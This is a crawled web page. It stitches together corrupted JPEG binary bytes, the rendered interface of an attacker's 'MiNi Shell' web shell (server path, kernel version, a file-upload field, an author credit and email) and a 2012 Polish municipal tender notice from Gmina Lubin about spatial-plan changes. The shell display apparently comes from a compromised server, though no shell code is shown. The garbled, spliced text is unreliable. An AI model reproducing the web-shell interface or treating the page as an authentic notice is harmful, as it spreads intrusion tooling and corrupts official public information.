JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120210/40698-N-2012.html

<p class="kh_header"><b>Lubin: OPRACOWANIE ZMIANY MIEJSCOWEGO PLANU ZAGOSPODAROWANIA PRZESTRZENNEGO GMINY LUBIN</b><br>
<b>Numer ogłoszenia: 40698 - 2012; data zamieszczenia: 10.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubin , ul. Władysława Łokietka 6, 59-300 Lubin, woj. dolnośląskie, tel. (76) 8403100, faks (76) 8403140.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ug-lubin.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE ZMIANY MIEJSCOWEGO PLANU ZAGOSPODAROWANIA PRZESTRZENNEGO GMINY LUBIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie zmiany miejscowego planu zagospodarowania przestrzennego gminy Lubin: obręb Gogołowice działki nr 116 i nr 117; obręb Gorzyca działka nr 188/1; obręb Kłopotów działka nr 172/2; obręb Krzeczyn Wielki działka nr 306                         i część działki nr 25/16; obręb Księginice działki nr 184 i nr 185 oraz część działek nr 3/5 i nr 131/4; obręb Miłoradzice działka nr 164; obręb Niemstów działki nr 148 i nr 149/6; obręb Raszówka działki nr 239/2 i nr 240; obręb Siedlce działki nr 257 i nr 256 i część działki nr 205/38; obręb Szklary Górne działki  nr 44/21 i nr 83/2; obręb Wiercień działki nr 286 i nr 517/2; całe obręby Buczynka                                            i Miroszowice.Niniejsze zamówienie obejmuje w szczególności opracowanie zmiany miejscowego planu zagospodarowania przestrzennego gminy Lubin:
-  obręb Gogołowice działki nr 116 i nr 117 z przeznaczeniem pod teren usług światy i wychowania, kultury i  administracji ( budowa świetlicy i obiektów rekreacyjno - sportowych, działalności kulturowej i wypoczynkowej), o powierzchni 0,60 ha; 
- obręb Gorzyca działka nr 188/1 z przeznaczeniem pod teren usług sportu i rekreacji oraz usług podstawowych (boiska sportowego, szkoły, place zabaw, świetlice i inne), o powierzchni 1,14 ha; 
- obręb Kłopotów działka nr 172/2 z przeznaczeniem pod teren usług sportu i rekreacji, o powierzchni 0,10 ha;
- obręb Krzeczyn Wielki działka nr 306 z przeznaczeniem pod teren rekreacyjno - sportowy, budowa świetlicy wiejskiej wraz z zabudową mieszkaniową, o powierzchni 2,10 ha,
- obręb Krzeczyn Wielki  część działki nr 25/16 z przeznaczeniem pod teren urządzeń zaopatrzenia                  w wodę z przeznaczeniem na ujęcie wody podziemnej (studnia głębinowa) wraz ze stacją uzdatniania, o powierzchni około 0,50 ha;
- obręb Księginice działki nr 184 i nr 185 z przeznaczeniem pod teren usług sportu i rekreacji oraz turystyki i wypoczynku, o powierzchni 1,75 ha;
- obręb Księginice część działki nr 3/5 z przeznaczeniem pod teren usług handlu, zdrowia, oświaty                  i wychowania, gastronomii, kultury i administracji, łączności i rzemiosła, o powierzchni około 1,40 ha;
- obręb Księginice  część działki nr 131/4 z przeznaczeniem pod teren obsługi komunikacji samochodowej (budowa parkingu), o powierzchni około 0,30 ha;
- obręb Miłoradzice działka nr 164 z przeznaczeniem pod teren usług sportu i rekreacji oraz turystyki                         i wypoczynku, o powierzchni 2,59 ha;
-  obręb Niemstów działki nr 148 i nr 149/6 z przeznaczeniem pod teren usług sportu i rekreacji oraz turystyki  i wypoczynku, o powierzchni 0,99 ha;
- obręb Raszówka działki nr 239/2 i nr 240 z przeznaczeniem teren usług sportu i rekreacji oraz turystyki i wypoczynku, o powierzchni 1,22 ha;
-  obręb Siedlce działki nr 257 i nr 256 z przeznaczeniem pod teren usług oświaty i wychowania, kultury i administracji z przeznaczeniem pod budowę świetlicy wiejskiej i obiektów rekreacyjno- sportowych oraz działalności kulturowej i wypoczynkowej, o powierzchni 1,54 ha;
- obręb Siedlce część działki nr 205/38 z przeznaczeniem pod teren usług oświaty i wychowania (boisko szkolne), o powierzchni około 1,00 ha;
- obręb Szklary Górne działka  nr 44/21 z przeznaczeniem pod teren urządzeń odprowadzania                         i oczyszczania ścieków wraz z zielenią i urządzeniami infrastruktury technicznej oraz pod teren                      o charakterze sportowo - rekreacyjnym w tym zabudowy kubaturowej: straż pożarna, świetlica itp.,                      o powierzchni 5,84 ha;
- obręb Szklary Górne działka nr 83/2 z przeznaczeniem pod teren zabudowy mieszkaniowej, zagrodowej, rezydencjonalnej, o powierzchni 3,10 ha;
- obręb Wiercień działka nr 286 z przeznaczeniem pod teren zabudowy mieszkaniowej, zagrodowej, rezydencjonalnej, o powierzchni 1,09 ha;
- obręb Wiercień działka  nr 517/2 z przeznaczeniem pod teren usług sportu i rekreacji oraz turystyki              i wypoczynku, o powierzchni 1,37 ha;
- cały obręb Buczynka;
- cały obręb  Miroszowice.
Wykonawca obowiązany jest wykonać zmiany planów  w formie tekstowej i graficznej zgodnie                     z zapisami studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Lubin oraz wymaganiami prawa ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym  (Dz. U. Nr 80, poz. 717 z późn.  zm.),  rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587), ustawą z dnia  3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.), innymi obowiązującymi przepisami oraz uchwałami od nr XVII/89/2011 do nr XVII/107/2011 Rady Gminy Lubin z dnia                 27 października 2011 r. w sprawie przystąpienia do sporządzenia zmian miejscowego planu zagospodarowania przestrzennego gminy Lubin.

Zmiana przedmiotu zamówienia z inicjatywy Zamawiającego może nastąpić pod warunkiem: że obejmuje realizację inwestycji, w zakresie który nie będzie przysparzał utrudnień w realizacji wyżej wymienionego przedmiotu zamówienia (mały zakres inwestycyjny obejmujący jedną działkę geodezyjną ewentualnie kilka działek) oraz nie będzie opóźniała realizacji zamówienia, jednak nie później niż przed wyłożeniem do publicznego wglądu projektu zmian miejscowego planu. W skład opracowania wchodzi: tekst  planu, który stanowi treść uchwały, część graficzna sporządzona w skali 1:1000  na kopii map zasadniczych albo w przypadku ich braku na mapach katastralnych, które pochodzą z państwowego zasobu geodezyjno - kartograficznego oraz wymagane rozstrzygnięcia planistyczne, które będą stanowiły załączniki (w tym: prognozę skutków finansowych oraz prognozę oddziaływania na środowisko).
  
Dokumentację planistyczną sporządzoną na poszczególnych etapach opracowania, należy przedłożyć          Zamawiającemu w ilościach odpowiednich dla przeprowadzenia kolejnych działań proceduralnych.

Zmiany  miejscowego planu wraz z załącznikami należy przygotować w LAPX Edytorze Aktów Prawnych XML wersja: APX Standard Network   w zapisie elektronicznym przekazanym na płycie CD.

Końcową dokumentację planistyczną wraz ze zmianami w miejscowym planie zagospodarowania przestrzennego należy sporządzić w 6-ciu egzemplarzach, wraz z opracowaniem w zapisie elektronicznym przekazanym na płycie CD.
Uwaga: Zapis elektroniczny musi być zgodny z oprogramowaniem w tutejszym Urzędzie, tak aby istniała możliwość odczytania zapisu. Wykonawca przenosi w granicach wynagrodzenia, jak w § 4 wzoru umowy, na Zamawiającego majątkowe prawa autorskie do opracowania  będącego  przedmiotem umowy na wszystkich polach eksploatacji  jak w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim                      i prawach pokrewnych ( Dz. U. z   2006 r. Nr 90, poz. 631 ze zm. ).

Oferta obejmuje udział Wykonawcy w działaniach formalno - prawnych, łącznie z przygotowaniem i wysłaniem  niezbędnych pism oraz sporządzeniem wszystkich wymaganych właściwymi przepisami dokumentów proceduralnych i planistycznych wraz z uczestnictwem na spotkaniach z Wójtem Gminy Lubin, uczestnictwem w posiedzeniach Komisji Rady Gminy Lubin i na sesjach Rady Gminy Lubin.        

Wybrany Wykonawca, przed podpisaniem umowy, zobowiązany jest opracować i dostarczyć do Zamawiającego, harmonogram  prac planistycznych wraz z wyceną poszczególnych etapów oraz    przewidywane terminy realizacji poszczególnych etapów.
Uwaga: Harmonogram prac planistycznych wraz z wyceną poszczególnych etapów należy tak opracować, aby całkowita wartość faktur przejściowych nie przekroczyła 50% ceny umownej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest wymagane wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch opracowań bądź zmiany miejscowego planu zagospodarowania przestrzennego, w tym w co najmniej jednym muszą występować tereny górnicze</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże, że dysponuje przynajmniej jedną osobą posiadającą uprawnienia planistyczne lub urbanistyczne i wpisaną na listę członków izby samorządu zawodowego, która będzie uczestniczyć w wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie potwierdzające spełnianie warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie i na warunkach określonych poniżej:

1. Zamawiający przewiduje możliwość zmiany umowy w zakresie wysokości wynagrodzenia:
a) ze względu na zmianę prawa podatkowego powodującą zmianę obowiązującej stawki
podatku VAT na usługi objęte umową oraz
b) ze względu na istotne zmiany przepisów dotyczących procedury opracowania (zmian)
miejscowego planu zagospodarowania przestrzennego - co wymaga uzasadnienia w terminie 30 dni od dnia obowiązywania ustawowych zmian.
2.Termin wykonania całości prac ( lub ich część ) może ulec ponownemu ustaleniu w przypadku :
a) złożenia uwag w trakcie wyłożenia projektu miejscowego planu do publicznego wglądu,
b) rozszerzenia lub zmiany danych wyjściowych prac Zamawiającego lub instytucje
uzgadniające,
c) istotnej zmiany przepisów dotyczących procedury opracowania ( zmian ) miejscowego
planu zagospodarowania przestrzennego uniemożliwiające wykonanie umowy w terminie.
Wykonawca zobowiązany jest udokumentować wystąpienie przesłanek jak w poz. a , b, c  i zawiadomi Zamawiającego o okolicznościach uzasadniających zmiany jak w pkt 2 w terminie 30 dni od dnia powstania działalności uzasadniających zmiany.  
3. Zmiana opracowania (będącego przedmiotem zamówienia) z inicjatywy Zamawiającego może nastąpić pod warunkiem, że obejmuje realizację inwestycji, w zakresie który nie będzie przysparzał utrudnień w realizacji wyżej wymienionego opracowania (mały zakres inwestycyjny obejmujący jedną działkę geodezyjną ewentualnie kilka działek) oraz nie będzie opóźniała realizacji zamówienia, jednak nie później niż przed wyłożeniem do publicznego wglądu projektu zmian miejscowego planu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ug-lubin.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Gminy Lubin, ul. Władysława Łokietka 6a, pok. nr 9, 59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego: Urząd Gminy Lubin, ul. Władysława Łokietka 6, pok. nr 3- sekretariat, 59-300 Lubin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com